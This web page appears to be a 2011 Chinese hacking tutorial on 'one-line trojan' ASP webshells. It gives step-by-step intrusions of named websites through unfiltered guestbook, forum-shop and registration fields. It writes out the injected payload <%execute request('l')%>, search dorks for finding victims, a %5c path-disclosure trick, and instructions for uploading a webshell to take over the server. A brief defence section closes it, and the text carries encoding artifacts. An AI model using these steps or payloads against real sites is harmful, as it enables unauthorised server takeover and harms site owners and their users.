軟件首頁 |  文章首頁
最新更新 軟件分類 設(shè)為首頁 加入收藏 聯(lián)系我們
當(dāng)前位置:首頁文章首頁 IT學(xué)院 IT技術(shù)

一句話木馬使用大全 一句話木馬使用技巧

作者:  來源:  發(fā)布時(shí)間:2011-3-22 16:19:37  點(diǎn)擊:

“ EASY NEWS新聞管理系統(tǒng) v1.01 正式版”是在企業(yè)網(wǎng)站中非常常見的一套整站模版,在該網(wǎng)站系統(tǒng)的留言本組件中就存在著數(shù)據(jù)過濾不嚴(yán)漏洞,如果網(wǎng)站是默認(rèn)路徑和默認(rèn)文件名安裝的話,入侵者可以利用該漏洞直接上傳ASP木馬程序控制整個(gè)網(wǎng)站服務(wù)器。
Step1 搜索入侵目標(biāo)
使用了“EASYNEWS新聞管理系統(tǒng) v1.01 正式版”的網(wǎng)站,在網(wǎng)站頁面的底部版權(quán)聲明處,往往會(huì)有關(guān)鍵字符為“WWW.52EASY.COM 版權(quán)所有”。只要在GOOGLE或百度中以該字符串為關(guān)鍵詞進(jìn)行搜索,就可以找到大量的入侵目標(biāo)。
Step2 檢測入侵條件
在這里,我們以網(wǎng)站“http://www.qswtj.com/news/index.htm”為例進(jìn)行一次入侵檢測。“EASYNEWS新聞管理系統(tǒng)”網(wǎng)站的留言本數(shù)據(jù)庫文件默認(rèn)是位于“\ebook\db\ebook.asp”,首先在瀏覽器地址欄中輸入“http://www.qswtj.com/news/ebook/db/ebook.asp”,回車后在瀏覽器頁面中將顯示訪問留言本數(shù)據(jù)庫文件的返回信息。如果在頁面中顯示亂碼,則說明該網(wǎng)站的留言本數(shù)據(jù)庫文件沒有改名,可以進(jìn)行入侵。
Step3 在數(shù)據(jù)庫中插入ASP后門
前面提到了該新聞系統(tǒng)的留言本插件存在過濾不嚴(yán),因此我們可以通過提交發(fā)言,在數(shù)據(jù)庫中插入“一句話木馬”服務(wù)端代碼:
在瀏覽器中訪問“http://www.qswtj.com/news/khly.htm”,打開提交留言頁面。在提交頁面中的“主頁”欄中,直接填寫“一句話木馬”服務(wù)端代碼,其它隨便填寫。確定后點(diǎn)擊“發(fā)表留言”按鈕,文章發(fā)表成功后,即可將“一句話木馬”服務(wù)端代碼插入到留言本數(shù)據(jù)庫中了。
Step4 連接后門上傳Webshell
由于留言本數(shù)據(jù)庫文件“ebook.asp”是一個(gè)ASP文件,所以我們插入到數(shù)據(jù)庫文件中的ASP語句將會(huì)被執(zhí)行。將“一句話木馬”客戶端中的提交地址改為留言本數(shù)據(jù)庫文件地址,然后用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中可以粘貼入其它的ASP木馬代碼,這里選擇的是桂林老兵網(wǎng)站管理助手ASP代碼。點(diǎn)擊提交按鈕后,剛才粘貼的ASP木馬將被寫入到論壇服務(wù)器中保存。
Step5 打開WEBSHELL
上傳的ASP木馬被保存到與數(shù)據(jù)庫文件同一WEB目錄下,文件名為“temp.asp”,因此我們?cè)贗E瀏覽器中打開頁面“http://www.qswtj.com/news/ebook/db/temp.asp”,輸入默認(rèn)的密碼“gxgl.com”,就可以看到一個(gè)WEBSHELL了。
在Webshell中可以上傳其它的文件或者安裝木馬后門、執(zhí)行各種命令等,網(wǎng)站的服務(wù)器已經(jīng)掌握在我們的手中,可以為所欲為了。
實(shí)例二 “社區(qū)超市”入侵動(dòng)網(wǎng)論壇
Step1 檢測入侵條件
以入侵論壇“http://www.bbsok.com/”為例。首先在瀏覽器地址欄中輸入“http://www.bbsok.com/data/shop.asp”,回車后在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區(qū)超市數(shù)據(jù)庫文件沒有改名或刪除,可以進(jìn)行入侵。
Step2 在數(shù)據(jù)庫中插入ASP后門
登錄論壇后,點(diǎn)擊頁面中的“娛樂”→“社區(qū)超市”,打開社區(qū)超市頁面。在該頁面中選擇商店申請(qǐng),打開“商店申請(qǐng)入駐”頁面“http://www.bbsok.com/z_shop_newshop.asp”,在頁面中填寫任意信息,注意在“商店招牌”欄中,添加剛才的ASP代碼"〈%execute request("l")%〉"。確定后點(diǎn)擊“申請(qǐng)”按鈕進(jìn)行提交,即可將ASP代碼保存在數(shù)據(jù)庫文件中了。
后面的步驟就與上面介紹的一樣了,只需要用藍(lán)屏木馬連接數(shù)據(jù)庫文件“http://sdoygb.w2.dvbbs.net/data/shop.asp”,然后上傳WEBSHELL就可以控制論壇服務(wù)器了。
實(shí)例三 “一句話木馬”入侵未知網(wǎng)站
從上面的兩個(gè)例子,我們可以看出利用“一句話木馬”入侵控制存在數(shù)據(jù)庫過濾不嚴(yán)漏洞的網(wǎng)站,成功的前提是一定要知道網(wǎng)站的數(shù)據(jù)庫地址。對(duì)于一些使用了未知網(wǎng)頁程序的網(wǎng)站,我們?nèi)绾尾拍苷业剿臄?shù)據(jù)庫地址呢?這就要結(jié)合暴庫或者跨站之類的方法了,下面只是結(jié)合一個(gè)簡單的暴庫,介紹一下利用一句話木馬入侵未知網(wǎng)站的方法。
Step1 暴庫得到數(shù)據(jù)庫路徑
以“http://bbs.dwself.com”為例。在瀏覽器中打開“http://bbs.dwself.com/join/listall.asp?bid=2”,將地址欄中join后的/改為%5c,在提交后的返回返回信息中可以看到網(wǎng)站數(shù)據(jù)庫地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,數(shù)據(jù)庫文件名中加入了“#”符號(hào),“#”符號(hào)在IE中執(zhí)行時(shí)被解釋為中斷符,要訪問該數(shù)據(jù)庫文件則必須將“#”號(hào)變?yōu)?ldquo;23%”才可以。因此數(shù)據(jù)庫文件的實(shí)際WEB地址為“http://bbs.dwself.com/join/admin/adshuilonG!%23).asp”
Step2 注冊(cè)網(wǎng)站,插入“一句話木馬”
由于數(shù)據(jù)庫文件是ASP文件格式的,滿足入侵條件,因此現(xiàn)在我們需要將“一句話木馬”插入到數(shù)據(jù)庫文件中去。
在網(wǎng)頁上點(diǎn)擊注冊(cè)網(wǎng)站按鈕,打開注冊(cè)鏈接“http://bbs.dwself.com/join/add.asp?action=step3&bid=3”,在資料填寫頁面處的站點(diǎn)名稱或地址中寫入“一句話木馬”服務(wù)端代碼,其它隨便填寫。然后點(diǎn)擊完成按鈕提交數(shù)據(jù),木馬服務(wù)端就被插入到數(shù)據(jù)庫文件中了。
最后只需要用藍(lán)屏木馬連接數(shù)據(jù)庫文件“http://bbs.dwself.com/join/admin/adshuilonG!%23).asp”,然后上傳ASP木馬就可以控制該網(wǎng)站的服務(wù)器了。
“一句話木馬”的防范:
要防范“一句話木馬”可以從兩方面進(jìn)行,首先是要隱藏網(wǎng)站的數(shù)據(jù)庫,不要讓攻擊者知道數(shù)據(jù)庫文件的鏈接地址。這就需要管理員在網(wǎng)頁程序中查被暴庫漏洞,在數(shù)據(jù)庫連接文件中加入容錯(cuò)代碼等,具體的防暴庫方法在這里就不作過多的講解了。
其次就是要防止用戶提交的數(shù)據(jù)未過濾漏洞,對(duì)用戶提交的數(shù)據(jù)進(jìn)行過濾,替換一些危險(xiǎn)的代碼等。例如中國站長聯(lián)盟網(wǎng)站在出現(xiàn)該漏洞后已經(jīng)對(duì)網(wǎng)頁程序進(jìn)行的修補(bǔ),插入的ASP代碼中的〈、〉和"等字符會(huì)被網(wǎng)頁程序轉(zhuǎn)換成其它字符,致使服務(wù)端代碼無法正常執(zhí)行。
只要作好這兩方面的安全工作,“一句話木馬”雖然無孔不入,但是面對(duì)這樣的網(wǎng)站系統(tǒng)也是無可奈何的了。

上一篇:2011編輯器漏洞總結(jié) 下一篇:

相關(guān)軟件

文章評(píng)論

本類推薦文章

關(guān)于本站 | 網(wǎng)站幫助 | 廣告合作 | 下載聲明 | 友情連接 | 網(wǎng)站地圖
Copyright © 20098-2010 uzzf下載站. All Rights Reserved .